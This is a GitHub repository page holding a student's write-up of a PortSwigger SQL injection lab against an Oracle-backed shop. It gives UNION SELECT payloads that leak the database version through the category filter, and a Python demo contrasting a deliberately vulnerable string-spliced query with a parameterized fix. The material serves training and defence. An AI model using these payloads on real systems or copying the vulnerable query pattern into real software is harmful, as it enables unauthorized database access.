https://github.com/kiarashvosough1999/web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
Last synced: 7 months ago
- Host: GitHub
- URL: https://github.com/kiarashvosough1999/web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
- Owner: kiarashvosough1999
- Created: 2023-05-28T12:03:55.000Z (over 2 years ago)
- Default Branch: master
- Last Pushed: 2023-05-28T12:54:07.000Z (over 2 years ago)
- Last Synced: 2025-01-29T13:45:40.526Z (9 months ago)
- Size: 2.53 MB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# web-security-academy-sql-injection-attack-querying-the-database-type-and-version-on-oracle
This repository is the solution to an assignment in a Data Security course. It is a PortSwigger [Lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle) that was assigned to me to solve.
# Description
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
# Solution
First we navigate to the 'Gifts' page and observe the parameters sent in the HTTP request. As we can see, it has a `category` parameter.

Now we append a single quote to see whether the server returns an internal error.

Now we can observe the request in the proxy; since we want to send several requests, we send it to Repeater.

So we add an SQL fragment to our `category` parameter to probe the vulnerability and check whether the original query returns 2 columns.

We repeat it with 3 columns.

Now let's get the database version. We add `'+UNION+SELECT+banner,+NULL+from+v$version-- ` to the parameter so that it is executed by the database, as the site's SQL injection cheat sheet suggests.
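To show why the category filter behaves this way, why the column count had to be established first, and what the fix looks like, here is an added Python example. It is not code from this repository or from PortSwigger: it assumes an in-memory SQLite table standing in for the lab's Oracle database, so the page's `v$version` query is replaced by SQLite's `sqlite_version()` function, and the product rows are constructed for the demo.

```python
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    # Constructed in-memory catalogue standing in for the lab's product table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("Desk plant", "Gifts"), ("Coffee beans", "Food")],
    )
    return conn


def filter_vulnerable(conn, category):
    # The flaw the lab exploits: the raw parameter is spliced into the SQL text,
    # so a quote closes the string literal and the remainder is parsed as SQL.
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def filter_parameterized(conn, category):
    # Hardened form: the value is bound as data and never reaches the SQL parser.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


# The page's payload shape, URL-decoded, with Oracle's `banner from v$version`
# swapped for SQLite's sqlite_version() (an assumption for an offline demo).
VERSION_PAYLOAD = unquote_plus("'+UNION+SELECT+sqlite_version(),+NULL--+")
# Same payload with one column too many, mirroring the 3-column probe.
THREE_COLUMN_PAYLOAD = unquote_plus("'+UNION+SELECT+sqlite_version(),+NULL,+NULL--+")


def leaked_version(conn):
    """Version string the vulnerable filter leaks, or None if nothing leaked."""
    rows = filter_vulnerable(conn, VERSION_PAYLOAD)
    return rows[0][0] if rows else None


def leak_matches_engine_version(conn):
    """True when the leaked string is the real engine version."""
    return leaked_version(conn) == sqlite3.sqlite_version


def mismatched_union_fails(conn):
    """True when a UNION with the wrong column count is rejected by the engine,
    which is why the write-up checks 2 versus 3 columns before selecting the banner."""
    try:
        filter_vulnerable(conn, THREE_COLUMN_PAYLOAD)
        return False
    except sqlite3.OperationalError:
        return True


def hardened_leaks_nothing(conn):
    """The parameterized filter treats the payload as a literal category value."""
    return filter_parameterized(conn, VERSION_PAYLOAD) == []


if __name__ == "__main__":
    db = make_db()
    print("vulnerable filter leaks:", leaked_version(db))
    print("3-column union rejected:", mismatched_union_fails(db))
    print("parameterized filter returns:", filter_parameterized(db, VERSION_PAYLOAD))
```

The parameterized version is the mitigation: the same input that returns the engine version from `filter_vulnerable` is just an unmatched category value in `filter_parameterized`. The column-count check is the same reason the write-up tries 2 and then 3 columns before the final query.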

# Result
Lab is solved.
